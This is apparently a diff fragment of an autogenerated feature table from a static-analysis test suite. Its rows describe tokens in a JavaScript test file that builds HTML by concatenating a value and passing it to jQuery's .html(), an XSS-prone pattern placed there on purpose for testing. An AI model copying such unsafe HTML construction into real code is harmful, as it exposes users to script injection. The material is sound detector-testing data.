tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:41:81:49 | "" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:41:81:49 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:81:41:81:49 | "" | stringConcatenatedWith | '' + val -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:25 | typeof val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:25 | typeof val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:25 | typeof val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:25 | typeof val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:25 | typeof val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | typeof ... number" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | typeof ... number" | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | typeof ... number" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | typeof ... number" | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | typeof ... number" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:16:82:38 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:23:82:25 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:23:82:25 | val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:23:82:25 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:23:82:25 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:23:82:25 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:31:82:38 | "number" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:31:82:38 | "number" | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:31:82:38 | "number" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:31:82:38 | "number" | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:82:31:82:38 | "number" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:9 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:9 | $ | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:9 | $ | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:9 | $ | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:9 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | $("#foo") | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | $("#foo") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | $("#foo") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | exceptional return of $("#foo") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | exceptional return of $("#foo") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:17 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:22 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:22 | $("#foo").html | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:22 | $("#foo").html | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:22 | $("#foo").html | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:22 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | $("#foo ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | $("#foo ... span>") | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | $("#foo ... span>") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | $("#foo ... span>") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | $("#foo ... span>") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | exceptional return of $("#foo ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | exceptional return of $("#foo ... span>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | exceptional return of $("#foo ... span>") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | exceptional return of $("#foo ... span>") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:9:83:50 | exceptional return of $("#foo ... span>") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:11:83:16 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:11:83:16 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:11:83:16 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23297,12 +153129,22 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:11:83:16 | "#foo" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:11:83:16 | "#foo" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:11:83:16 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:19:83:22 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:19:83:22 | html | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:19:83:22 | html | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:19:83:22 | html | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:19:83:22 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:31 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:31 | "" | contextSurroundingFunctionParameters | (val) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:31 | "" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:31 | "" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:31 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:31 | "" | stringConcatenatedWith | -endpoint- val + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:37 | "" + val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:37 | "" + val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:37 | "" + val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:37 | "" + val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:37 | "" + val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:49 | " ... /span>" | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:49 | " ... /span>" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:24:83:49 | " ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23322,6 +153164,61 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:41:83:49 | "" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:41:83:49 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:83:41:83:49 | "" | stringConcatenatedWith | '' + val -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:25 | typeof val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:25 | typeof val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:25 | typeof val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:25 | typeof val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:25 | typeof val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | typeof ... oolean" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | typeof ... oolean" | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | typeof ... oolean" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | typeof ... oolean" | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | typeof ... oolean" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | val | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:16:84:39 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:23:84:25 | val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:23:84:25 | val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:23:84:25 | val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:23:84:25 | val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:23:84:25 | val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:31:84:39 | "boolean" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:31:84:39 | "boolean" | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:31:84:39 | "boolean" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:31:84:39 | "boolean" | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:84:31:84:39 | "boolean" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:9 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:9 | $ | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:9 | $ | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:9 | $ | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:9 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | $("#foo") | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | $("#foo") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | $("#foo") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | exceptional return of $("#foo") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | exceptional return of $("#foo") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:17 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:22 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:22 | $("#foo").html | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:22 | $("#foo").html | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:22 | $("#foo").html | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:22 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| 